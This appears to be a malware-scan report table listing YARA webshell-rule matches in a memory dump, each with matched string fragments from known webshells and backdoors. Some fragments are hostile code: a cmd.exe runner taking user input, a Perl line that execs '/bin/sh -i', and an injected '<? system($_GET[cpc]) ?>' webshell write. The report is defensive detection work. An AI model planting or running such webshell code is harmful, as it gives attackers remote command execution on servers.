| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpshell | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4c299:$s1: echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><b
- 0x4c2ee:$s2: $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_UR
- 0x4c343:$s3: $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\",
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_cmd | Webshells Auto-generated - file cmd.asp | Yara Bulk Rule Generator by Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x1c51b:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_phpft | Webshells Auto-generated - file phpft.php | Yara Bulk Rule Generator by Florian Roth | - 0x4c5a0:$s6: PHP Files Thief
- 0x2d6e4:$s11: http://www.4ngel.net
- 0x33267:$s11: http://www.4ngel.net
- 0x4c5b5:$s11: http://www.4ngel.net
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_indexer | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4c686:$s3: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="r
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | r57shell | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4c790:$s11: $_POST['cmd']="echo \"Now script try connect to
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | bdcli100 | Webshells Auto-generated - file bdcli100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c879:$s5: unable to connect to
- 0x4c893:$s8: backdoor is corrupted on
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_2005Red | Webshells Auto-generated - file 2005Red.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4c971:$s0: scrollbar-darkshadow-color:#FF9DBB;
- 0x4be91:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4c999:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4bee6:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x4c9ee:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006X2 | Webshells Auto-generated - file 2006X2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x45c80:$s2: Powered By
- 0x4cafe:$s2: Powered By
- 0x4cb0e:$s3: " onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rdrbs084 | Webshells Auto-generated - file rdrbs084.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4cc17:$s0: Create mapped port. You have to specify domain when using HTTP type.
- 0x4cc60:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_CaseSwitch_2005 | Webshells Auto-generated - file 2005.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4cd6d:$s1: MSComDlg.CommonDialog
- 0x4cd87:$s2: CommonDialog1
- 0x4cd99:$s3: __vbaExceptHandler
- 0x50c80:$s3: __vbaExceptHandler
- 0x4cdb0:$s4: EVENT_SINK_Release
- 0x50c97:$s4: EVENT_SINK_Release
- 0x4cdc7:$s5: EVENT_SINK_AddRef
- 0x4cddd:$s6: By Marcos
- 0x4cdeb:$s7: EVENT_SINK_QueryInterface
- 0x4ce09:$s8: MethCallEngine
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | eBayId_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x4ced3:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x4ff05:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phvayv | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x4cfcb:$s2: wrap="OFF">XXXX</textarea></font><font face
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | byshell063_ntboot | Webshells Auto-generated - file ntboot.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4d0b6:$s0: SYSTEM\CurrentControlSet\Services\NtBoot
- 0x4d0e3:$s1: Failure ... Access is Denied !
- 0x4de01:$s1: Failure ... Access is Denied !
- 0x4d106:$s2: Dumping Description to Registry...
- 0x4de4a:$s2: Dumping Description to Registry...
- 0x4d12d:$s3: Opening Service .... Failure !
- 0x4de71:$s3: Opening Service .... Failure !
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_casus15_2 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x3112c:$s0: copy ( $dosya_gonder
- 0x4d20a:$s0: copy ( $dosya_gonder
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | installer | Webshells Auto-generated - file installer.cmd | Yara Bulk Rule Generator by Florian Roth | - 0x4d2d9:$s0: Restore Old Vanquish
- 0x4d2f2:$s4: ReInstall Vanquish
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | uploader | Webshells Auto-generated - file uploader.php | Yara Bulk Rule Generator by Florian Roth | - 0x328fe:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x41385:$s0: move_uploaded_file($userfile, "entrika.php");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_remview_2 | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x4d3c3:$s0: <xmp>$out</
- 0x4d3d3:$s1: .mm("Eval PHP code").
- 0x4fa02:$s1: .mm("Eval PHP code").
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_r57 | Webshells Auto-generated - file r57.php | Yara Bulk Rule Generator by Florian Roth | - 0x4d4b0:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file'].
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006X | Webshells Auto-generated - file 2006X.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4d5aa:$s1: <input name="password" type="password" id="password"
- 0x4d5e3:$s6: name="theAction" type="text" id="theAction"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phvayv_2 | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x4d6cb:$s2: rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | elmaliseker | Webshells Auto-generated - file elmaliseker.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4d7c5:$s0: javascript:Command('Download'
- 0x4d7e7:$s5: zombie_array=array(
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_resolve | Webshells Auto-generated - file resolve.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4d8c5:$s0: 3^n6B(Ed3
- 0x4d8d3:$s1: ^uldn'Vt(x
- 0x4d8e2:$s2: \= uPKfp
- 0x4d8ef:$s3: 'r.axV<ad
- 0x4d8fd:$s4: p,modoi$=sr(
- 0x4d90e:$s5: DiamondC8S t
- 0x4d91f:$s6: `lQ9fX<ZvJW
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_RemExp | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4d9e5:$s1: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.Ser
- 0x4da3a:$s5: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=F
- 0x4da8f:$s6: <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_tool | Webshells Auto-generated - file tool.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4db96:$s7: ""%windir%\\calc.exe"")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4dc77:$s0: window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp
- 0x4dccc:$s3: <input name="dbname" type="hidden" id="dbname" value="<%=request("dbname")%>">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | byloader | Webshells Auto-generated - file byloader.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4ddd3:$s0: SYSTEM\CurrentControlSet\Services\NtfsChk
- 0x4d0e3:$s1: Failure ... Access is Denied !
- 0x4de01:$s1: Failure ... Access is Denied !
- 0x4de24:$s2: NTFS Disk Driver Checking Service
- 0x4d106:$s3: Dumping Description to Registry...
- 0x4de4a:$s3: Dumping Description to Registry...
- 0x4d12d:$s4: Opening Service .... Failure !
- 0x4de71:$s4: Opening Service .... Failure !
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_Fport | Webshells Auto-generated - file Fport.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4df56:$s4: Copyright 2000 by Foundstone, Inc.
- 0x4df7d:$s5: You must have administrator privileges to run fport - exiting...
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | BackDooR__fr_ | Webshells Auto-generated - file BackDooR (fr).php | Yara Bulk Rule Generator by Florian Roth | - 0x4e080:$s3: print("<p align=\"center\"><font size=\"5\">Exploit include
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_ntdaddy | Webshells Auto-generated - file ntdaddy.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4e179:$s1: <input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="s
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | nstview_nstview | Webshells Auto-generated - file nstview.php | Yara Bulk Rule Generator by Florian Roth | - 0x4e285:$s4: open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_upload | Webshells Auto-generated - file upload.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4e398:$s0: PageUpload Below -->
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PasswordReminder | Webshells Auto-generated - file PasswordReminder.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4e47a:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Pack_InjectT | Webshells Auto-generated - file InjectT.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4e577:$s3: ail To Open Registry
- 0x52ad8:$s3: ail To Open Registry
- 0x4e590:$s4: 32fDssignim
- 0x4e5a0:$s5: vide Internet S
- 0x4e5b4:$s6: d]Software\M
- 0x4e5c5:$s7: TInject.Dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_RemExp_2 | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4e68d:$s2: Then Response.Write "
- 0x4e6a8:$s3: <a href= "<%=Request.ServerVariables("script_name")%>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_c99 | Webshells Auto-generated - file c99.php | Yara Bulk Rule Generator by Florian Roth | - 0x4e792:$s2: "txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacce
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rknt_zip_Folder_RkNT | Webshells Auto-generated - file RkNT.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4e895:$s0: PathStripPathA
- 0x4e8a8:$s1: `cLGet!Addr%
- 0x49b6e:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x4e8b9:$s2: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x4e90c:$s3: oQToOemBuff* <=
- 0x4e920:$s4: ionCdunAsw[Us'
- 0x4e933:$s6: CreateProcessW: %S
- 0x4e94a:$s7: ImageDirectoryEntryToData
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | dbgntboot | Webshells Auto-generated - file dbgntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4ea1e:$s2: now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp
- 0x4ea73:$s3: sth junk the M$ Wind0wZ retur
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_shell | Webshells Auto-generated - file shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4eb47:$s0: AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz
- 0x4eb99:$s11: 1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hxdef100 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4ec9e:$s0: RtlAnsiStringToUnicodeString
- 0x4ecbf:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x4f093:$s8: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x4ecee:$s9: \\.\mailslot\hxdef-rk100sABCDEFGH
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rdrbs100 | Webshells Auto-generated - file rdrbs100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4edc8:$s3: Server address must be IP in A.B.C.D format.
- 0x4edf9:$s4: mapped ports in the list. Currently
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4eedd:$s0: OpenProcess error!
- 0x4eef4:$s1: WriteProcessMemory error!
- 0x4ef12:$s4: GetProcAddress error!
- 0x4ef2c:$s5: HHt`HHt\
- 0x4ef39:$s6: Cmaudi0
- 0x4ef45:$s7: CreateRemoteThread error!
- 0x143e8:$s8: Kernel32
- 0x1457e:$s8: Kernel32
- 0x4ef63:$s8: Kernel32
- 0x4ef70:$s9: VirtualAllocEx error!
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hxdef100_2 | Webshells Auto-generated - file hxdef100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4f040:$s0: \\.\mailslot\hxdef-rkc000
- 0x4f05e:$s2: Shared Components\On Access Scanner\BehaviourBlo
- 0x4ecbf:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
- 0x4f093:$s6: SYSTEM\CurrentControlSet\Control\SafeBoot\
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Release_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4f17c:$s0: ;;;Y;`;d;h;l;p;t;x;|;
- 0x4f196:$s1: 0 0&00060K0R0X0f0l0q0w0
- 0x4f1b2:$s2: : :$:(:,:0:4:8:D:`=d=
- 0x4f1cc:$s3: 4@5P5T5\5T7\7d7l7t7|7
- 0x4f1e6:$s4: 1,121>1C1K1Q1X1^1e1k1s1y1
- 0x4f204:$s5: 9 9$9(9,9P9X9\9`9d9h9l9p9t9x9|9
- 0x4f228:$s6: 0)0O0\0a0o0"1E1P1q1
- 0x4f240:$s7: <.<I<d<h<l<p<t<x<|<
- 0x4f258:$s8: 3&31383>3F3Q3X3`3f3w3|3
- 0x4f274:$s9: 8@;D;H;L;P;T;X;\;a;9=W=z=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webadmin | Webshells Auto-generated - file webadmin.php | Yara Bulk Rule Generator by Florian Roth | - 0x4f346:$s0: <input name=\"editfilename\" type=\"text\" class=\"style1\" value='".$this->inpu
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | commands | Webshells Auto-generated - file commands.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4f44f:$s1: If CheckRecord("SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = " & VictimID
- 0x4f4a4:$s2: proxyArr = Array ("HTTP_X_FORWARDED_FOR","HTTP_VIA","HTTP_CACHE_CONTROL","HTTP_F
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hkdoordll | Webshells Auto-generated - file hkdoordll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4f5af:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | r57shell_2 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4f6ba:$s2: echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_v1_45_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4f7cf:$s3: syspath
- 0x4c0fd:$s4: \Mithril
- 0x4f7db:$s4: \Mithril
- 0x4fbdf:$s4: \Mithril
- 0x4f7e8:$s5: --list the services in the computer
- 0x50ea5:$s5: --list the services in the computer
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | dbgiis6cli | Webshells Auto-generated - file dbgiis6cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4f8c8:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- 0x4f90c:$s5: ###command:(NO more than 100 bytes!)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | remview_2003_04_22 | Webshells Auto-generated - file remview_2003_04_22.php | Yara Bulk Rule Generator by Florian Roth | - 0x4f9fd:$s1: "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_test | Webshells Auto-generated - file test.php | Yara Bulk Rule Generator by Florian Roth | - 0x370b8:$s0: $yazi = "test" . "\r\n";
- 0x4faf3:$s0: $yazi = "test" . "\r\n";
- 0x370d5:$s2: fwrite ($fp, "$yazi");
- 0x4fb10:$s2: fwrite ($fp, "$yazi");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Debug_cress | Webshells Auto-generated - file cress.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4fbdf:$s0: \Mithril
- 0x4c067:$s4: Mithril.exe
- 0x4ee5b:$s4: Mithril.exe
- 0x4fbed:$s4: Mithril.exe
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_EFSO_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4fda3:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x52056:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x4fdf8:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x520ab:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | thelast_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x4ff05:$s5: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"Your Name\" field is r
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | adjustcr | Webshells Auto-generated - file adjustcr.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4bbbc:$s0: $Info: This file is packed with the UPX executable packer $
- 0x5000e:$s0: $Info: This file is packed with the UPX executable packer $
- 0x5004e:$s2: $License: NRV for UPX is distributed under special license $
- 0x5008f:$s6: AdjustCR Carr
- 0x4bc11:$s7: ION\System\FloatingPo
- 0x500a1:$s7: ION\System\FloatingPo
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_xIShell | Webshells Auto-generated - file xIShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x50186:$s3: if (!$nix) { $xid = implode(explode("\\",$xid),"\\\\");}echo ("<td><a href='Java
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_AppPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50295:$s6: " onclick="this.form.sqlStr.value='e:\hytop.mdb
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell | Webshells Auto-generated - file xssshell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x5037d:$s1: if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), "pushComma
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_usr | Webshells Auto-generated - file usr.php | Yara Bulk Rule Generator by Florian Roth | - 0x50495:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phpinj | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x401cd:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x505a0:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell_db | Webshells Auto-generated - file db.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50694:$s8: '// By Ferruh Mavituna | http://ferruh.mavituna.com
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_sh | Webshells Auto-generated - file sh.php | Yara Bulk Rule Generator by Florian Roth | - 0x50778:$s1: "@$SERVER_NAME ".exec("pwd")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell_default | Webshells Auto-generated - file default.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50854:$s3: If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | EditServer_Webshell_2 | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x50963:$s0: @HOTMAIL.COM
- 0x50974:$s1: Press Any Ke
- 0x50985:$s3: glish MenuZ
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | by064cli | Webshells Auto-generated - file by064cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x50a49:$s7: packet dropped,redirecting
- 0x50a68:$s9: input the password(the default one is 'by')
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x50b52:$s0: please enter the password:
- 0x50b71:$s3: \dllTest.pdb
- 0x50e94:$s3: \dllTest.pdb
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | peek_a_boo | Webshells Auto-generated - file peek-a-boo.exe | Yara Bulk Rule Generator by Florian Roth | - 0x50c3a:$s0: __vbaHresultCheckObj
- 0x50c53:$s1: \VB\VB5.OLB
- 0x50c63:$s2: capGetDriverDescriptionA
- 0x4cd99:$s3: __vbaExceptHandler
- 0x50c80:$s3: __vbaExceptHandler
- 0x4cdb0:$s4: EVENT_SINK_Release
- 0x50c97:$s4: EVENT_SINK_Release
- 0x50cae:$s8: __vbaErrorOverflow
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | fmlibraryv3 | Webshells Auto-generated - file fmlibraryv3.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50d7f:$s3: ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Debug_dllTest_2 | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x50e8e:$s4: \Debug\dllTest.pdb
- 0x4f7e8:$s5: --list the services in the computer
- 0x50ea5:$s5: --list the services in the computer
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | connector | Webshells Auto-generated - file connector.asp | Yara Bulk Rule Generator by Florian Roth | - 0x50f83:$s2: If ( AttackID = BROADCAST_ATTACK )
- 0x50faa:$s4: Add UNIQUE ID for victims / zombies
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_HideRun | Webshells Auto-generated - file HideRun.exe | Yara Bulk Rule Generator by Florian Roth | - 0x51098:$s0: Usage -- hiderun [AppName]
- 0x510b7:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Shell_v1_7 | Webshells Auto-generated - file PHP_Shell_v1.7.php | Yara Bulk Rule Generator by Florian Roth | - 0x3464d:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x511a4:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | xssshell_save | Webshells Auto-generated - file save.asp | Yara Bulk Rule Generator by Florian Roth | - 0x5128e:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
- 0x512e2:$s5: VictimID = fm_NStr(Victims(i))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phpinj_2 | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x514a5:$s9: <? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ZXshell2_0_rar_Folder_zxrecv | Webshells Auto-generated - file zxrecv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x515a1:$s0: RyFlushBuff
- 0x515b1:$s1: teToWideChar^FiYP
- 0x515c7:$s2: mdesc+8F D
- 0x515d6:$s3: \von76std
- 0x515e4:$s4: 5pur+virtul
- 0x515f4:$s5: - Kablto io
- 0x51604:$s6: ac#f{lowi8a
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_ajan | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x25b28:$s4: entrika.write "BinaryStream.SaveToFile
- 0x516c6:$s4: entrika.write "BinaryStream.SaveToFile
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | c99shell | Webshells Auto-generated - file c99shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x517a5:$s0: <br />Input URL: <input name=\"uploadurl\" type=\"text\"&
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpspy_2005_full | Webshells Auto-generated - file phpspy_2005_full.php | Yara Bulk Rule Generator by Florian Roth | - 0x518be:$s7: echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlenco
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_zehir4_2 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | - 0x519cb:$s4: "Program Files\Serv-u\Serv
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_indexer_2 | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x51aa4:$s5: <td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
|
